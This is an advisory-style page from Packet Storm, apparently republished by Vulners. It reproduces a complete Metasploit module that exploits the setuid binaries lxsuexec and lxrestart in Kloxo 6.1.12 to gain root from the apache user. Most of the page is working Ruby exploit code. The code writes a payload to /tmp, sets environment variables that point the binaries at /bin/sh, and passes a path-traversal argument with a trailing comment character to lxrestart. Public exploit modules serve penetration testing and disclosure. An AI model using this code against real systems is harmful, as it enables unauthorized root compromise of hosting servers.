Kloxo 6.1.12 Privilege Escalation

🗓️ 15 May 2013 00:00:00Reported by juan vazquezType

packetstorm🔗 packetstormsecurity.com👁 22 Views

Kloxo 6.1.12 Privilege Escalation affecting setuid root binaries lxsuexec and lxrestart, allowing local privilege escalation to root from uid 48, Apache by default on CentOS 5.8

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
require 'rex'  
require 'msf/core/post/common'  
require 'msf/core/exploit/local/linux'  
require 'msf/core/exploit/exe'  
  
class Metasploit4 < Msf::Exploit::Local  
  
include Msf::Exploit::EXE  
include Msf::Post::File  
include Msf::Post::Common  
include Msf::Exploit::FileDropper  
  
include Msf::Exploit::Local::Linux  
  
def initialize(info={})  
super(update_info(info, {  
'Name' => 'Kloxo Local Privilege Escalation',  
'Description' => %q{  
Version 6.1.12 and earlier of Kloxo contain two setuid root binaries such as  
lxsuexec and lxrestart, allow local privilege escalation to root from uid 48,  
Apache by default on CentOS 5.8, the operating system supported by Kloxo.  
This module has been tested successfully with Kloxo 6.1.12 and 6.1.6.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'HTP', # Original PoC according to exploit-db  
'juan vazquez' # Metasploit module  
],  
'Platform' => [ 'linux' ],  
'Arch' => [ ARCH_X86 ],  
'SessionTypes' => [ 'shell' ],  
'Payload' =>  
{  
'Space' => 8000,  
'DisableNops' => true  
},  
'References' =>  
[  
[ 'EDB', '25406' ],  
[ 'URL', 'http://roothackers.net/showthread.php?tid=92' ] # post referencing the vulnerability and PoC  
],  
'Targets' =>  
[  
[ 'Kloxo 6.1.12', {} ]  
],  
'DefaultOptions' =>  
{  
'PrependSetuid' => true  
},  
'DefaultTarget' => 0,  
'Privileged' => true,  
'DisclosureDate' => "Sep 18 2012"  
}))  
end  
  
def exploit  
# apache uid (48) is needed in order to abuse the setuid lxsuexec binary  
# .text:0804869D call _getuid  
# .text:080486A2 cmp eax, 48  
# .text:080486A5 jz short loc_80486B6 // uid == 48 (typically apache on CentOS)  
# .text:080486A7 mov [ebp+var_A4], 0Ah  
# .text:080486B1 jmp loc_8048B62 // finish if uid != 48  
# .text:08048B62 loc_8048B62: ; CODE XREF: main+39j  
#.text:08048B62 ; main+B0j  
#.text:08048B62 mov eax, [ebp+var_A4]  
#.text:08048B68 add esp, 0ECh  
#.text:08048B6E pop ecx  
#.text:08048B6F pop esi  
#.text:08048B70 pop edi  
#.text:08048B71 pop ebp  
#.text:08048B72 lea esp, [ecx-4]  
#.text:08048B75 retn  
#.text:08048B75 main endp  
print_status("Checking actual uid...")  
id = cmd_exec("id -u")  
if id != "48"  
fail_with(Exploit::Failure::NoAccess, "You are uid #{id}, you must be uid 48(apache) to exploit this")  
end  
  
# Write msf payload to /tmp and give provide executable perms  
pl = generate_payload_exe  
payload_path = "/tmp/#{rand_text_alpha(4)}"  
print_status("Writing payload executable (#{pl.length} bytes) to #{payload_path} ...")  
write_file(payload_path, pl)  
register_file_for_cleanup(payload_path)  
  
# Profit  
print_status("Exploiting...")  
cmd_exec("chmod +x #{payload_path}")  
cmd_exec("LXLABS=`cat /etc/passwd | grep lxlabs | cut -d: -f3`")  
cmd_exec("export MUID=$LXLABS")  
cmd_exec("export GID=$LXLABS")  
cmd_exec("export TARGET=/bin/sh")  
cmd_exec("export CHECK_GID=0")  
cmd_exec("export NON_RESIDENT=1")  
helper_path = "/tmp/#{rand_text_alpha(4)}"  
write_file(helper_path, "/usr/sbin/lxrestart '../../..#{payload_path} #'")  
register_file_for_cleanup(helper_path)  
cmd_exec("lxsuexec #{helper_path}")  
end  
  
end  
`

15 May 2013 00:00Current

0.6Low risk

Vulners AI Score0.6